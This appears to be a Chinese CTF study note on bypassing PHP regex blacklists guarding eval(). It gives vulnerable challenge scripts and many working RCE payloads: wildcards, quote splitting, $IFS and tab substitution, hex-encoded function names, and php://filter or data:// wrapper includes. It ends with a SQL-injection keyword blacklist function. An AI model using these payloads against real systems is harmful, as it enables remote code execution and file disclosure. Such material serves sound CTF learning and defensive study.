命令執行繞過技巧
參考:https://blog.csdn.net/weixin_39190897/article/details/116247765
參考:https://blog.csdn.net/solitudi/article/details/109837640
正則過濾
參考:https://www.runoob.com/php/php-preg_match.html
參考:https://www.runoob.com/regexp/regexp-syntax.html
if(!preg_match("/flag/i", $c)){ eval($c); }
題目1
<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }
payload1
通配符 payload1:c=system("nl fla?????"); payload2:c=system("nl fla*"); payload3:c=echo `nl fl''ag.php`;或者c=echo `nl fl“”ag.php`; payload4:c=echo `nl fl\ag.php`;//轉義字符繞過 payload5:c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php payload6:c=eval($_GET[1]);&1=system('nl flag.php'); payload7:c=awk '{printf $0}' flag.php||
題目2
<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }
payload2
system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() 反引號` `同shell_exec() c=echo exec('nl fla?????'); c=echo `nl fla''g.p''hp`; c=echo `nl fla?????`; 還有上一道題的很多payload都可以使用
題目3
<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }
payload3
cat被過濾
more:一頁一頁的顯示檔案內容 less:與 more 類似 head:查看頭幾行 tac:從最後一行開始顯示,可以看出 tac 是 cat 的反向顯示 tail:查看尾幾行 nl:顯示的時候,順便輸出行號 od:以二進制的方式讀取檔案內容 vi:一種編輯器,這個也可以查看 vim:一種編輯器,這個也可以查看 sort:可以查看 uniq:可以查看 file -f:報錯出具體內容 grep 1、在當前目錄中,查找後綴有 file 字樣的文件中包含 test 字符串的文件,並打印出該字符串的行。此時,可以使用如下命令: grep test *file strings 2、find . -name "*.c" find . -type f :將當前目錄及其子目錄中的所有文件列出:
payload3
c=eval($_GET[1]);&1=system('nl flag.php'); c=highlight_file(next(array_reverse(scandir(dirname(__FILE__))))); c=show_source(next(array_reverse(scandir(pos(localeconv()))))); c=echo(`nl%09fl[abc]*`); c="\x73\x79\x73\x74\x65\x6d"("nl%09fl[a]*");等價於system() c=echo`strings%09f*`; c=echo`strings\$IFS\$9f*`必須加轉義字符
還有其他姿勢:
首先print_r(scandir(dirname(__FILE__)));查看當前目錄下文件 然後找到flag.php print_r(next(array_reverse(scandir(dirname(__FILE__))))); 之後高亮顯示即可 c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
小知識:include不用括號,分號可以用?>代替。
c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?> c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
字符替換
參考:https://blog.csdn.net/weixin_44300286/article/details/96597167
替換字符 $id= blacklist($id); $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; echo $sql; echo "<br>"; function blacklist($id) { $id= preg_replace('/or/i',"", $id); //去掉OR(不區分大小寫) $id= preg_replace('/and/i',"", $id); //去掉AND(不區分大小寫) $id= preg_replace('/[\/\*]/',"", $id); //去掉 /* $id= preg_replace('/[--]/',"", $id); //去掉 -- $id= preg_replace('/[#]/',"", $id); //去掉 # $id= preg_replace('/[\s]/',"", $id); //去掉 空格 $id= preg_replace('/[ +]/',"", $id); //去掉 空格 $id= preg_replace('/[\/\\\\]/',"", $id); //去掉 斜槓 //$id= preg_replace('/select/m',"", $id); //去掉 空格 $id= preg_replace('/union/s',"", $id); //去掉 union $id= preg_replace('/select/s',"", $id); //去掉 select $id= preg_replace('/UNION/s',"", $id); //去掉 UNION $id= preg_replace('/SELECT/s',"", $id); //去掉 SELECT $id= preg_replace('/Union/s',"", $id); //去掉 Union $id= preg_replace('/Select/s',"", $id); //去掉 Select $id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT. return $id; }